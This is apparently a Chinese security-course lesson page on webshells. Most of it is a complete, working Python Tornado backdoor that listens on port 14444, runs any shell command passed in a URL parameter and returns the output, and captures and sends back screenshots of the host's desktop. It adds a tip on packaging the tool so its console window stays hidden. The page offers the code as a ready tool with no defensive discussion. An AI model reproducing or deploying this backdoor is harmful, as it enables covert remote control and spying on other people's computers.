T3SEC —–第十三讲:webshell

{% meting "2111364820" "tencent" "playlist" "theme:#FF4081" "mode:circulation" "mutex:true" "listmaxheight:200px" "preload:auto" "autoplay" %}

webshell,截屏远程控制利器

技术分解:

  • webspp:web应用
  • http:80/https:443/ws:80/wss:443
    • 通信协议:
    • http(https)/tcp/udp/ws(wss)
  • cmd/shell等
  • html/css/js等
  • python/asp/php/jsp等
  • 二进制等
  • 流控制等

webshell:

  • urlshell
  • view shell

打包时后面加 -m可隐藏命令行

#python webshell
# 步骤:
#1:构建一款HTTP协议的服务器
#2:独立开放特定端口(http80/自定义端口)
#3:构建一个视图view(mvc)->APP
#4:执行shell命令 + 截取对方的桌面

#环境: tornado pyautogui os 

from tornado.web import RequestHandler,Application
from tornado.ioloop import IOLoop 
from tornado.options import options,parse_command_line,define
from tornado.httpserver import HTTPServer
import platform
import os
import pyautogui


if platform.system()=='Windows':
    import asyncio
    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())

define('port',default=14444,help='这是http协议的通信端口')

#视图类 (页面)
class index(RequestHandler):
    #post get
    def get(self):
        #定义并获取url的参数http://localhost:14444/?wd=
        cmd=self.get_query_argument("wd",'')
        if cmd == 'screenshot':
            #截屏操作
            img=pyautogui.screenshot()
            img.save('screenshot.jpg')
            #二进制返回
            pic = open('screenshot.jpg','rb')
            pics = pic.read()
            self.write(pics)
            self.set_header("Content-type","image/png")
        else:
            rs=os.popen(cmd,'r')
            self.write(rs.read())
            
#应用
def makeapp():
    return Application([(r'/',index)])
if __name__ == '__main__':
    parse_command_line()
    app=makeapp()
    #装载 把应用部署到httpserver中
    server = HTTPServer(app)
    server.bind(options.port)
    server.start()
    #轮询监听
    IOLoop.current().start()

Q.E.D.